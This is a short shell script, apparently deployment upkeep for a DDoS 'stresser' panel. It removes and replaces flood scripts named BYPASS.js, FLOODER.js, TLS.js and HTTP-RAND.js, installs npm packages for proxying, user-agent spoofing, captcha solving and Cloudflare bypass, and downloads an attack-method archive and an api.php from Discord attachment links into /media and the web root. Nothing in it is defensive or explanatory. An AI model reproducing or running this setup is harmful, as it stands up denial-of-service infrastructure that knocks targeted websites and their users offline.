//Remove & Update

cd /media/ && rm -rf BYPASS.js && rm -rf FLOODER.js && rm -rf HTTPS.js && rm -rf TLS.js && rm -rf RAND.js && rm -rf MIX.js && rm -rf HYPER.js && rm -rf RAW.js && rm -rf BYPASS.js && rm -rf api.php && rm -rf proxy.txt && rm -rf v2.js && rm -rf HTTP-RAND.js && rm -rf TLS.js && rm -rf raw.js && rm -rf LOAD.js && rm -rf TLS2.js && rm -rf scrape.js && rm -rf METHODS.zip && rm -rf TLZ.js && rm -rf ua.txt

sudo npm i gradient-string && sudo npm i cluster && sudo npm i crypto && sudo npm i http && sudo npm i http2 && sudo npm i net && sudo npm i tls && sudo npm i url && sudo npm i fs && sudo npm i request && sudo npm i fake-useragent && sudo npm i randomstring && sudo npm i events && sudo npm i cloudscraper && sudo npm i user-agents && sudo npm i requests && sudo npm i https-proxy-agent && sudo npm i crypto-random-string && sudo npm i events && sudo npm i fs && sudo npm i net && sudo npm i cloudscraper && sudo npm i request && sudo npm i hcaptcha-solver && sudo npm i randomstring && sudo npm i cluster && sudo npm i cloudflare-bypasser

wget https://cdn.discordapp.com/attachments/1141344450648494273/1141344695528722472/METHOD.zip && cd /media && sudo unzip METHOD.zip && cd && cd /var/www/html/ && rm -rf api.php && wget https://cdn.discordapp.com/attachments/1141344450648494273/1141345291656757399/api.php && cd